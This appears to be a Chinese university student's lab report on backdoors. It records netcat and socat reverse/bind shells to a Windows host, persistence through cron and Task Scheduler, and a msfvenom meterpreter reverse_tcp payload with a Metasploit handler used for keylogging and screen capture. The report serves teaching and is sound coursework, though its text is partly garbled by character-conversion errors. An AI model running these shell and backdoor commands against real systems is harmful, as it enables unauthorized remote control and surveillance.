20145238-荆玉茗《网络对抗》-后门原理与实践

《网络对抗》——后门原理与实践

1、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 答:在网上下载东西的时候,总会有不想要的应用连带着下载下来,好比某大师,并且下载之后还一直没法删除,有一段时间cpu占用率就超级高,可是没开什么应用。
    可能这是一个后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 开机自启动;开启别的应用时自动加载;在网页上超连接;

(3)Meterpreter有哪些给你映像深入的功能?

  • 此次关于meterpreter的实验我都很是惊讶,从传输后门程序,到抓主机键盘键,主机屏幕,还有看到别人抓到摄像头,,,仿佛在电脑上工做,就像在一个透明的玻璃箱里工做。虽然知道这些技能很酷炫,但我更想了解一些怎样才能防护这些后门植入的知识。

(4)如何发现本身有系统有没有被安装后门?

  • 先用杀毒软件吧,,,及时监控进程是否异常,数据流异常以及开机自启动项,看看有没有消耗cpu特别大的进程。

2、实验总结与体会

  • 本次实验整体来讲仍是坎坷的,从socat就开始遇到问题,一方面是win10自己的问题,另外一方面是本身并非十分清楚步骤的流程以及为何这样,因此致使不少顺序的颠倒,ip地址的写错...各类小缘由都成为我没法继续的绊脚石。本次实验第一次让我感觉到了做为一名“hacker”的酷炫,在大三下才真正的接触到网络攻防,哇~~~好开心,痛苦并快乐着。回归主题就是,本次实验让我感觉到网络“攻防”,即“攻”也得“防”,两者缺一不可,网络在个人脑海里从一个“黑匣子”慢慢变成一个“玻璃箱”。但愿之后能继续认真作每一次实验,继续努力~

3、实践过程记录

1.用nc获取远程主机的shell

①在linux获取windows 的shelllinux

  • 在windows中下载netcat,解压后复制到c盘windows\system32中。
  • linux IP:192.168.228.128
    windows IP:172.30.6.146
  • linux获取windows的shell
    在kali中输入指令nc -l -p 端口号来设置监听;

在Windows中输入指令ncat.exe -e cmd kali的IP 端口号来将本身的cmd传给kali;
shell

  • 在linux中能够看到拥有了windows cmd的命令提示,记得要退出system32文件夹才能够看ipconfig哦。

②cron启动windows

  • 使用crontab -e修改配置文件,将最后一行改成m h dom mon dow user command:wq!保存并退出。
    网络

  • 使用crontab -l
    dom

这样kali内每小时的第20分钟自动运行指令,反弹至pc端的5238端口tcp

2.使用socat获取主机操做shell

  • 在windows系统中打开控制面板—管理工具-任务计划程序-建立任务-填写任务名称后新建触发器,以下图所示。
    工具

  • 在操做-程序或脚本中选择socat.exe文件路径,在添加参数中写tcp-listen:5238 exec:cmd.exe,pty,stderr,即将cmd.exe绑定到5238端口,同时将cmd.exestderr重定向到stdout上。以后能够看到本身的任务,右键运行!
    3d

  • 在linux中输入socat - tcp:IP:端口号
    code

3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机shell

  • 在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=端口号 -f exe >20145224.exe生成后门程序:
    blog

  • ncat传输后门文件
    windows系统使用ncat.exe -lv 端口号 > 保存文件名监听准备接受文件;

kali系统使用ncat -nv 主机IP 端口号 < 文件名来发送指定文件;

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 在kali中输入msfconsole
  • 继续输入use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 主机IP
  • set LPORT 端口号
  • show options(检查全部数据是否正确)
  • exploit

  • 双击windows中的后门应用程序,此时在kali中即可以成控制远程windows的shell了~。

屏幕截图

键盘抓取

其余

  • 错误一

解决方法:首先是添加的触发器进程没有运行...其次是端口可能被占用,改了之后仍是不行,最后发现他的ip变了!!!!!!真的变了!以后成功了。

  • 错误二:最后meterpreter,windows这边运行后门程序,可是linux那边没有反应,太蓝过了就忘记截图了。 解决方法:第一次试了很久都没好,次日就行了......很尴尬,可能须要从新启动计算机,让他开始运行。
相关文章
相关标签/搜索